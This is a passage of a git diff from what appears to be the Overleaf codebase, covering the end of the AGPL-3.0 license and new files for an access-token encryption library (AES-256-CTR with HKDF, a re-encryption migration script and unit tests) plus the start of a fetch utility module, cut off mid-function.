30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +. diff --git a/libraries/access-token-encryptor/README.md b/libraries/access-token-encryptor/README.md new file mode 100644 index 0000000..73607e5 --- /dev/null +++ b/libraries/access-token-encryptor/README.md @@ -0,0 +1,3 @@ +# Access Token Encryptor + +Used in third-party-references, to encrypt access tokens diff --git a/libraries/access-token-encryptor/buildscript.txt b/libraries/access-token-encryptor/buildscript.txt new file mode 100644 index 0000000..36fd724 --- /dev/null +++ b/libraries/access-token-encryptor/buildscript.txt @@ -0,0 +1,10 @@ +access-token-encryptor +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/access-token-encryptor/index.js b/libraries/access-token-encryptor/index.js new file mode 100644 index 0000000..5a466dd --- /dev/null +++ b/libraries/access-token-encryptor/index.js @@ -0,0 +1 @@ +module.exports = require('./lib/js/AccessTokenEncryptor') diff --git a/libraries/access-token-encryptor/lib/js/AccessTokenEncryptor.js b/libraries/access-token-encryptor/lib/js/AccessTokenEncryptor.js new file mode 100644 index 0000000..aa8078c --- /dev/null +++ b/libraries/access-token-encryptor/lib/js/AccessTokenEncryptor.js @@ -0,0 +1,164 @@ +const { promisify } = require('node:util') +const crypto = require('node:crypto') + +const ALGORITHM = 'aes-256-ctr' + +const cryptoHkdf = promisify(crypto.hkdf) +const cryptoRandomBytes = promisify(crypto.randomBytes) + +class AbstractAccessTokenScheme { + constructor(cipherLabel, cipherPassword) { + this.cipherLabel = cipherLabel + this.cipherPassword = cipherPassword + } + + /** + * @param {Object} json + * @return {Promise} + */ + async encryptJson(json) { + throw new Error('encryptJson is not implemented') + } + + /** + * @param {string} encryptedJson + * @return {Promise} + */ + async decryptToJson(encryptedJson) { + throw new Error('decryptToJson is not implemented') + } +} + +class AccessTokenSchemeWithGenericKeyFn extends AbstractAccessTokenScheme { + /** + * @param {Buffer} salt + * @return {Promise} + */ + async keyFn(salt) { + throw new Error('keyFn is not implemented') + } + + async encryptJson(json) { + const plainText = JSON.stringify(json) + + const bytes = await cryptoRandomBytes(32) + const salt = bytes.slice(0, 16) + const iv = bytes.slice(16, 32) + const key = await this.keyFn(salt) + + const cipher = crypto.createCipheriv(ALGORITHM, key, iv) + const cipherText = + cipher.update(plainText, 'utf8', 'base64') + cipher.final('base64') + + return [ + this.cipherLabel, + salt.toString('hex'), + cipherText, + iv.toString('hex'), + ].join(':') + } + + async decryptToJson(encryptedJson) { + const [, salt, cipherText, iv] = encryptedJson.split(':', 4) + const key = await this.keyFn(Buffer.from(salt, 'hex')) + + const decipher = crypto.createDecipheriv( + ALGORITHM, + key, + Buffer.from(iv, 'hex') + ) + const plainText = + decipher.update(cipherText, 'base64', 'utf8') + decipher.final('utf8') + try { + return JSON.parse(plainText) + } catch (e) { + throw new Error('error decrypting token') + } + } +} + +class AccessTokenSchemeV3 extends AccessTokenSchemeWithGenericKeyFn { + async keyFn(salt) { + const optionalInfo = '' + return await cryptoHkdf( + 'sha512', + this.cipherPassword, + salt, + optionalInfo, + 32 + ) + } +} + +class AccessTokenEncryptor { + constructor(settings) { + /** + * @type {Map} + */ + this.schemeByCipherLabel = new Map() + for (const cipherLabel of Object.keys(settings.cipherPasswords)) { + if (!cipherLabel) { + throw new Error('cipherLabel cannot be empty') + } + if (cipherLabel.match(/:/)) { + throw new Error( + `cipherLabel must not contain a colon (:), got ${cipherLabel}` + ) + } + const [, version] = cipherLabel.split('-') + if (!version) { + throw new Error( + `cipherLabel must contain version suffix (e.g. 2042.1-v42), got ${cipherLabel}` + ) + } + + const cipherPassword = settings.cipherPasswords[cipherLabel] + if (!cipherPassword) { + throw new Error(`cipherPasswords['${cipherLabel}'] is missing`) + } + if (cipherPassword.length < 16) { + throw new Error(`cipherPasswords['${cipherLabel}'] is too short`) + } + + let scheme + switch (version) { + case 'v3': + scheme = new AccessTokenSchemeV3(cipherLabel, cipherPassword) + break + default: + throw new Error(`unknown version '${version}' for ${cipherLabel}`) + } + this.schemeByCipherLabel.set(cipherLabel, scheme) + } + + /** @type {AbstractAccessTokenScheme} */ + this.defaultScheme = this.schemeByCipherLabel.get(settings.cipherLabel) + if (!this.defaultScheme) { + throw new Error(`unknown default cipherLabel ${settings.cipherLabel}`) + } + } + + promises = { + encryptJson: async json => await this.defaultScheme.encryptJson(json), + decryptToJson: async encryptedJson => { + const [label] = encryptedJson.split(':', 1) + const scheme = this.schemeByCipherLabel.get(label) + if (!scheme) { + throw new Error('unknown access-token-encryptor label ' + label) + } + return await scheme.decryptToJson(encryptedJson) + }, + } + + encryptJson(json, callback) { + this.promises.encryptJson(json).then(s => callback(null, s), callback) + } + + decryptToJson(encryptedJson, callback) { + this.promises + .decryptToJson(encryptedJson) + .then(o => callback(null, o), callback) + } +} + +module.exports = AccessTokenEncryptor diff --git a/libraries/access-token-encryptor/package.json b/libraries/access-token-encryptor/package.json new file mode 100644 index 0000000..b767f50 --- /dev/null +++ b/libraries/access-token-encryptor/package.json @@ -0,0 +1,28 @@ +{ + "name": "@overleaf/access-token-encryptor", + "version": "3.0.0", + "description": "", + "main": "index.js", + "scripts": { + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test:ci": "npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "types:check": "tsc --noEmit" + }, + "author": "", + "license": "AGPL-3.0-only", + "dependencies": { + "lodash": "^4.17.21" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "typescript": "^5.0.4" + } +} diff --git a/libraries/access-token-encryptor/scripts/helpers/format-usage-stats.js b/libraries/access-token-encryptor/scripts/helpers/format-usage-stats.js new file mode 100644 index 0000000..f32f5fb --- /dev/null +++ b/libraries/access-token-encryptor/scripts/helpers/format-usage-stats.js @@ -0,0 +1,27 @@ +function formatTokenUsageStats(STATS) { + const prettyStats = [] + const sortedStats = Object.entries(STATS).sort((a, b) => + a[0] > b[0] ? 1 : -1 + ) + const totalByName = {} + for (const [key, n] of sortedStats) { + const [name, version, collectionName, path, label] = key.split(':') + totalByName[name] = (totalByName[name] || 0) + n + prettyStats.push({ name, version, collectionName, path, label, n }) + } + for (const row of prettyStats) { + row.percentage = ((100 * row.n) / totalByName[row.name]) + .toFixed(2) + .padStart(6) + } + + if (prettyStats.length === 0) { + console.warn('---') + console.warn('Found 0 access tokens.') + console.warn('---') + } else { + console.table(prettyStats) + } +} + +module.exports = { formatTokenUsageStats } diff --git a/libraries/access-token-encryptor/scripts/helpers/re-encrypt-tokens.js b/libraries/access-token-encryptor/scripts/helpers/re-encrypt-tokens.js new file mode 100644 index 0000000..b39bede --- /dev/null +++ b/libraries/access-token-encryptor/scripts/helpers/re-encrypt-tokens.js @@ -0,0 +1,108 @@ +const _ = require('lodash') +const { formatTokenUsageStats } = require('./format-usage-stats') + +const LOG_EVERY_IN_S = parseInt(process.env.LOG_EVERY_IN_S || '5', 10) +const DRY_RUN = !process.argv.includes('--dry-run=false') + +/** + * @param {AccessTokenEncryptor} accessTokenEncryptor + * @param {string} encryptedJson + * @return {Promise} + */ +async function reEncryptTokens(accessTokenEncryptor, encryptedJson) { + return await new Promise((resolve, reject) => { + accessTokenEncryptor.decryptToJson(encryptedJson, (err, json) => { + if (err) return reject(err) + accessTokenEncryptor.encryptJson(json, (err, reEncryptedJson) => { + if (err) return reject(err) + resolve(reEncryptedJson) + }) + }) + }) +} + +/** + * @param {AccessTokenEncryptor} accessTokenEncryptor + * @param {Collection} collection + * @param {Object} paths + * @param {Object} queryOptions + * @return {Promise<{}>} + */ +async function reEncryptTokensInCollection({ + accessTokenEncryptor, + collection, + paths, + queryOptions, +}) { + const { collectionName } = collection + const stats = {} + + let processed = 0 + let updatedNUsers = 0 + let lastLog = 0 + const logProgress = () => { + if (DRY_RUN) { + console.warn( + `processed ${processed} | Would have updated ${updatedNUsers} users` + ) + } else { + console.warn(`processed ${processed} | Updated ${updatedNUsers} users`) + } + } + + const projection = { _id: 1 } + for (const path of Object.values(paths)) { + projection[path] = 1 + } + const cursor = collection.find( + {}, + { + ...queryOptions, + projection, + } + ) + + for await (const doc of cursor) { + processed++ + + let update = null + for (const [name, path] of Object.entries(paths)) { + const blob = _.get(doc, path) + if (!blob) continue + // Schema: LABEL-VERSION:SALT:CIPHERTEXT:IV + const [label] = blob.split(':') + let [, version] = label.split('-') + version = version || 'v2' + + const key = [name, version, collectionName, path, label].join(':') + stats[key] = (stats[key] || 0) + 1 + + if (version === 'v2') { + update = update || {} + update[path] = await reEncryptTokens(accessTokenEncryptor, blob) + } + } + + if (Date.now() - lastLog >= LOG_EVERY_IN_S * 1000) { + logProgress() + lastLog = Date.now() + } + if (update) { + updatedNUsers++ + + const { _id } = doc + if (DRY_RUN) { + console.log('Would upgrade tokens for user', _id, Object.keys(update)) + } else { + console.log('Upgrading tokens for user', _id, Object.keys(update)) + await collection.updateOne({ _id }, { $set: update }) + } + } + } + logProgress() + formatTokenUsageStats(stats) +} + +module.exports = { + reEncryptTokensInCollection, +} diff --git a/libraries/access-token-encryptor/test/setup.js b/libraries/access-token-encryptor/test/setup.js new file mode 100644 index 0000000..9af82f6 --- /dev/null +++ b/libraries/access-token-encryptor/test/setup.js @@ -0,0 +1,13 @@ +const chai = require('chai') +const chaiAsPromised = require('chai-as-promised') +const SandboxedModule = require('sandboxed-module') + +chai.use(chaiAsPromised) + +SandboxedModule.configure({ + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) diff --git a/libraries/access-token-encryptor/test/unit/js/AccessTokenEncryptorTests.js b/libraries/access-token-encryptor/test/unit/js/AccessTokenEncryptorTests.js new file mode 100644 index 0000000..9aab924 --- /dev/null +++ b/libraries/access-token-encryptor/test/unit/js/AccessTokenEncryptorTests.js @@ -0,0 +1,305 @@ +const chai = require('chai') +chai.should() +const { expect } = chai +const modulePath = '../../../index.js' +const SandboxedModule = require('sandboxed-module') + +describe('AccessTokenEncryptor', function () { + beforeEach(function () { + this.testObject = { hello: 'world' } + this.encrypted2015 = + '2015.1:473a66fb5d816bc716f278ab819d88a5:+mTg7O9sgUND8pNQFG6h2GE=' + this.encrypted2016 = + '2016.1:76a7d64a444ccee1a515b49c44844a69:m5YSkexUsLjcF4gLncm72+k=' + this.encrypted2019 = + '2019.1:627143b2ab185a020c8720253a4c984e:7gnY6Ez3/Y3UWgLHLfBtJsE=:bf75cecb6aeea55b3c060e1122d2a82d' + this.encrypted2023 = + '2023.1-v3:a6dd3781dd6ce93a4134874b505a209c:9TdIDAc8V9SeR0ffSn63Jj4=:d8b2de0b733c81b949993dce229abb4c' + this.badLabel = 'xxxxxx:c7a39310056b694c:jQf+Uh5Den3JREtvc82GW5Q=' + this.badKey = '2015.1:d7a39310056b694c:jQf+Uh5Den3JREtvc82GW5Q=' + this.badCipherText = '2015.1:c7a39310056b694c:xQf+Uh5Den3JREtvc82GW5Q=' + this.settings = { + cipherLabel: '2023.1-v3', + cipherPasswords: { + '2023.1-v3': '44444444444444444444444444444444444444', + }, + } + this.AccessTokenEncryptor = SandboxedModule.require(modulePath, { + globals: { + Buffer, + }, + }) + this.encryptor = new this.AccessTokenEncryptor(this.settings) + }) + + describe('invalid settings', function () { + it('should flag missing label', function () { + expect( + () => + new this.AccessTokenEncryptor({ + cipherLabel: '', + cipherPasswords: { '': '' }, + }) + ).to.throw(/cipherLabel cannot be empty/) + }) + + it('should flag invalid label with colon', function () { + expect( + () => + new this.AccessTokenEncryptor({ + cipherLabel: '2023:1-v2', + cipherPasswords: { '2023:1-v2': '' }, + }) + ).to.throw(/colon/) + }) + + it('should flag missing password', function () { + expect( + () => + new this.AccessTokenEncryptor({ + cipherPasswords: { '2023.1-v3': '' }, + cipherVersions: { '2023.1-v3': 'v3' }, + }) + ).to.throw(/cipherPasswords.+ missing/) + expect( + () => + new this.AccessTokenEncryptor({ + cipherLabel: '2023.1-v3', + cipherPasswords: { '2023.1-v3': undefined }, + }) + ).to.throw(/cipherPasswords.+ missing/) + }) + + it('should flag short password', function () { + expect( + () => + new this.AccessTokenEncryptor({ + cipherLabel: '2023.1-v3', + cipherPasswords: { '2023.1-v3': 'foo' }, + }) + ).to.throw(/cipherPasswords.+ too short/) + }) + + it('should flag missing version', function () { + expect( + () => + new this.AccessTokenEncryptor({ + cipherLabel: '2023.1', + cipherPasswords: { 2023.1: '11111111111111111111111111111111' }, + }) + ).to.throw(/must contain version suffix/) + expect( + () => + new this.AccessTokenEncryptor({ + cipherLabel: '2023.1-', + cipherPasswords: { '2023.1-': '11111111111111111111111111111111' }, + }) + ).to.throw(/must contain version suffix/) + }) + + it('should flag invalid version', function () { + expect( + () => + new this.AccessTokenEncryptor({ + cipherLabel: '2023.1-v0', + cipherPasswords: { + '2023.1-v0': '11111111111111111111111111111111', + }, + }) + ).to.throw(/unknown version/) + }) + + it('should flag unknown default scheme', function () { + expect( + () => + new this.AccessTokenEncryptor({ + cipherLabel: '2000.1-v3', + cipherPasswords: { + '2023.1-v3': '11111111111111111111111111111111', + }, + }) + ).to.throw(/unknown default cipherLabel/) + }) + }) + + describe('sync', function () { + describe('encrypt', function () { + it('should encrypt the object', function (done) { + this.encryptor.encryptJson(this.testObject, (err, encrypted) => { + expect(err).to.be.null + encrypted.should.match( + /^2023.1-v3:[0-9a-f]{32}:[a-zA-Z0-9=+/]+:[0-9a-f]{32}$/ + ) + done() + }) + }) + + it('should encrypt the object differently the next time', function (done) { + this.encryptor.encryptJson(this.testObject, (err, encrypted1) => { + expect(err).to.be.null + this.encryptor.encryptJson(this.testObject, (err, encrypted2) => { + expect(err).to.be.null + encrypted1.should.not.equal(encrypted2) + done() + }) + }) + }) + }) + + describe('decrypt', function () { + it('should decrypt the string to get the same object', function (done) { + this.encryptor.encryptJson(this.testObject, (err, encrypted) => { + expect(err).to.be.null + this.encryptor.decryptToJson(encrypted, (err, decrypted) => { + expect(err).to.be.null + expect(decrypted).to.deep.equal(this.testObject) + done() + }) + }) + }) + + it('should not be able to decrypt 2015 string', function (done) { + this.encryptor.decryptToJson(this.encrypted2015, (err, decrypted) => { + expect(err).to.exist + expect(err.message).to.equal( + 'unknown access-token-encryptor label 2015.1' + ) + expect(decrypted).to.not.exist + done() + }) + }) + + it('should not be able to decrypt a 2016 string', function (done) { + this.encryptor.decryptToJson(this.encrypted2016, (err, decrypted) => { + expect(err).to.exist + expect(err.message).to.equal( + 'unknown access-token-encryptor label 2016.1' + ) + expect(decrypted).to.not.exist + done() + }) + }) + + it('should not be able to decrypt a 2019 string', function (done) { + this.encryptor.decryptToJson(this.encrypted2019, (err, decrypted) => { + expect(err).to.exist + expect(err.message).to.equal( + 'unknown access-token-encryptor label 2019.1' + ) + expect(decrypted).to.not.exist + done() + }) + }) + + it('should decrypt an 2023 string to get the same object', function (done) { + this.encryptor.decryptToJson(this.encrypted2023, (err, decrypted) => { + expect(err).to.be.null + expect(decrypted).to.deep.equal(this.testObject) + done() + }) + }) + + it('should return an error when decrypting an invalid label', function (done) { + this.encryptor.decryptToJson(this.badLabel, (err, decrypted) => { + expect(err).to.be.instanceof(Error) + expect(decrypted).to.be.undefined + done() + }) + }) + + it('should return an error when decrypting an invalid key', function (done) { + this.encryptor.decryptToJson(this.badKey, (err, decrypted) => { + expect(err).to.be.instanceof(Error) + expect(decrypted).to.be.undefined + done() + }) + }) + + it('should return an error when decrypting an invalid ciphertext', function (done) { + this.encryptor.decryptToJson(this.badCipherText, (err, decrypted) => { + expect(err).to.be.instanceof(Error) + expect(decrypted).to.be.undefined + done() + }) + }) + }) + }) + + describe('async', function () { + describe('encrypt', function () { + it('should encrypt the object', async function () { + const encrypted = await this.encryptor.promises.encryptJson( + this.testObject + ) + encrypted.should.match( + /^2023.1-v3:[0-9a-f]{32}:[a-zA-Z0-9=+/]+:[0-9a-f]{32}$/ + ) + }) + + it('should encrypt the object differently the next time', async function () { + const encrypted1 = await this.encryptor.promises.encryptJson( + this.testObject + ) + const encrypted2 = await this.encryptor.promises.encryptJson( + this.testObject + ) + encrypted1.should.not.equal(encrypted2) + }) + }) + + describe('decrypt', function () { + it('should decrypt the string to get the same object', async function () { + const encrypted = await this.encryptor.promises.encryptJson( + this.testObject + ) + const decrypted = await this.encryptor.promises.decryptToJson(encrypted) + expect(decrypted).to.deep.equal(this.testObject) + }) + + it('should not be able to decrypt 2015 string', async function () { + await expect( + this.encryptor.promises.decryptToJson(this.encrypted2015) + ).to.eventually.be.rejectedWith( + 'unknown access-token-encryptor label 2015.1' + ) + }) + + it('should not be able to decrypt a 2016 string', async function () { + await expect( + this.encryptor.promises.decryptToJson(this.encrypted2016) + ).to.be.rejectedWith('unknown access-token-encryptor label 2016.1') + }) + + it('should not be able to decrypt a 2019 string', async function () { + await expect( + this.encryptor.promises.decryptToJson(this.encrypted2019) + ).to.be.rejectedWith('unknown access-token-encryptor label 2019.1') + }) + + it('should decrypt an 2023 string to get the same object', async function () { + const decrypted = await this.encryptor.promises.decryptToJson( + this.encrypted2023 + ) + expect(decrypted).to.deep.equal(this.testObject) + }) + + it('should return an error when decrypting an invalid label', async function () { + await expect( + this.encryptor.promises.decryptToJson(this.badLabel) + ).to.be.rejectedWith('unknown access-token-encryptor label xxxxxx') + }) + + it('should return an error when decrypting an invalid key', async function () { + await expect( + this.encryptor.promises.decryptToJson(this.badKey) + ).to.be.rejectedWith('unknown access-token-encryptor label 2015.1') + }) + + it('should return an error when decrypting an invalid ciphertext', async function () { + await expect( + this.encryptor.promises.decryptToJson(this.badCipherText) + ).to.be.rejectedWith('unknown access-token-encryptor label 2015.1') + }) + }) + }) +}) diff --git a/libraries/access-token-encryptor/tsconfig.json b/libraries/access-token-encryptor/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/access-token-encryptor/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/fetch-utils/.gitignore b/libraries/fetch-utils/.gitignore new file mode 100644 index 0000000..edb0f85 --- /dev/null +++ b/libraries/fetch-utils/.gitignore @@ -0,0 +1,3 @@ + +# managed by monorepo$ bin/update_build_scripts +.npmrc diff --git a/libraries/fetch-utils/.mocharc.json b/libraries/fetch-utils/.mocharc.json new file mode 100644 index 0000000..c492858 --- /dev/null +++ b/libraries/fetch-utils/.mocharc.json @@ -0,0 +1,6 @@ +{ + "ui": "bdd", + "recursive": "true", + "reporter": "spec", + "require": "test/setup.js" +} diff --git a/libraries/fetch-utils/.nvmrc b/libraries/fetch-utils/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/fetch-utils/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/fetch-utils/buildscript.txt b/libraries/fetch-utils/buildscript.txt new file mode 100644 index 0000000..a158079 --- /dev/null +++ b/libraries/fetch-utils/buildscript.txt @@ -0,0 +1,10 @@ +fetch-utils +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/fetch-utils/index.js b/libraries/fetch-utils/index.js new file mode 100644 index 0000000..643dcc7 --- /dev/null +++ b/libraries/fetch-utils/index.js @@ -0,0 +1,320 @@ +const _ = require('lodash') +const { Readable } = require('node:stream') +const OError = require('@overleaf/o-error') +const fetch = require('node-fetch') +const http = require('node:http') +const https = require('node:https') + +/** + * @import { Response } from 'node-fetch' + */ + +/** + * Make a request and return the parsed JSON response. + * + * @param {string | URL} url - request URL + * @param {any} [opts] - fetch options + * @return {Promise} the parsed JSON response + * @throws {RequestFailedError} if the response has a failure status code + */ +async function fetchJson(url, opts = {}) { + const { json } = await fetchJsonWithResponse(url, opts) + return json +} + +async function fetchJsonWithResponse(url, opts = {}) { + const { fetchOpts } = parseOpts(opts) + fetchOpts.headers = fetchOpts.headers ?? {} + fetchOpts.headers.Accept = fetchOpts.headers.Accept ?? 'application/json' + + const response = await performRequest(url, fetchOpts) + if (!response.ok) { + const body = await maybeGetResponseBody(response) + throw new RequestFailedError(url, opts, response, body) + } + + const json = await response.json() + return { json, response } +} + +/** + * Make a request and return a stream. + * + * If the response body is destroyed, the request is aborted. + * + * @param {string | URL} url - request URL + * @param {any} [opts] - fetch options + * @return {Promise} + * @throws {RequestFailedError} if the response has a failure status code + */ +async function fetchStream(url, opts = {}) { + const { stream } = await fetchStreamWithResponse(url, opts) + return stream +} + +async function fetchStreamWithResponse(url, opts = {}) { + const { fetchOpts, abortController } = parseOpts(opts) + const response = await performRequest(url, fetchOpts) + + if (!response.ok) { + const body = await maybeGetResponseBody(response) + throw new RequestFailedError(url, opts, response, body) + } + + 